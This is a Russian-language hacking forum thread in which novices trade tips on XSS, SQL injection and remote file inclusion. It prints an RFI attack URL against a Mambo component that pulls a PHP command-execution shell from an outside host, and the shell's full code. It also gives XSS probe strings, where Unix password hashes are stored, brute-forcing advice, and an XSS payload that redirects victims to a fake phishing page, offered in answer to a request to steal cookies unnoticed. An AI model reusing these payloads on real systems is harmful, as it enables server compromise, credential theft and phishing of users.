самео простое - вводи в поля ввода такую штуку: '">xss и смотри где код вышел за пределы ковычки. ДЛя активных ксс - <>><}{)(xss()'=" - смотри в исходнике что фильтруется а что нет
В разделе php инжекции нашел вот такой инжект - Пытаюсь приконектится к серверу по SSH программой putty, login: root . В putty логин ввести можно, а пароль даже не видно как вводит. Нажимаю Enter - пишет, что доступ закрыт. Подскажите пожалуйста, в чём проблема? И еще, в passwd лежат пароли от пользователей?
Подскажите что делает эта инекция? Пытались применить её к vBulletin. PHP: //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? Содержимое странички _http://www.entgiftungspad.de/cache/cmd7.gif PHP: <?php echo "Mic22"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit;
Spaise, в /etc/passwd пароли лежали в старых версиях ядер Сейчас паролей там нет, а лежат они в /etc/shadow - если у тебя Линукс или Соларис, /etc/master.passwd - Если у тебя *BSD Доступны они только руту xaker-boss, вообше то это удалённый инклуд в компоненте Мамбо - com_mambowiki, хз как вы пытались его к Булке применить
Spyder да эт не я пытался, а меня пытались ламанут, просто загленул в свой ЛОГ и у видел там это. Спасибо
Уважаемые господа. Не первый раз сталкиваюсь с такой бедой. Запрос такого вида : Ошибка такого вида : Вопрос: Что это такое. И где можно прочитать какое то описание, как правильно провести иньекцию. С удовольствием выслушаю ваши советы. P.S. И еще вопрос . 1. В MSSQL идет фильтрация на TOP и на From . если вместо TOP я могу еще поставить max то фром мне полюбому нужен. Что можно сделать в этой ситуации?
mff логины к ssh которые нередко подходят к фтп узнать прова на сервере для определённого юзверя используй для бруа к примеру на совпадение логина и пасса
Я такого еще не встречал,может кто подскажет при запросе, например: выплевывает очень интересную ошибку ------------------------------------------------------ и такое, не первый раз встречаю что это может быть?
Здрасти.Извините я сильно новичок... .Вот нашол я в чате багу с Xss/ Как написать мне что бы куки без палева переходили на мыло или на сайт.. .И плиз можете кинуть ссылку на тему типа"Что можно сделать с багой в Xss"
samarin по первой ссылке это называется те со скулей облом по второй те вообще выдало все поля бд E_FATAL_NOSACHOBJ тут тоже не инжэкт а апросто ашибка самой базы
2Buffalon попробуй вот так сделай фейк этой страницы либо ручками либо через anyfake воткни на хостинг и воткнить в xss такой : Code: <script type="text/javascript">window.top.location = "http://путь ктвоему фейку";</script> что собствеено откроет в этом же окне твой фейк !ссылка на почитати выше
то есть я это написал,он мне пишет что страница не найдена=значит что нет xss а если он сьел,то значит я роюсь в исходнике?или это отображается как та на странице?оч хочу разобраться в xss
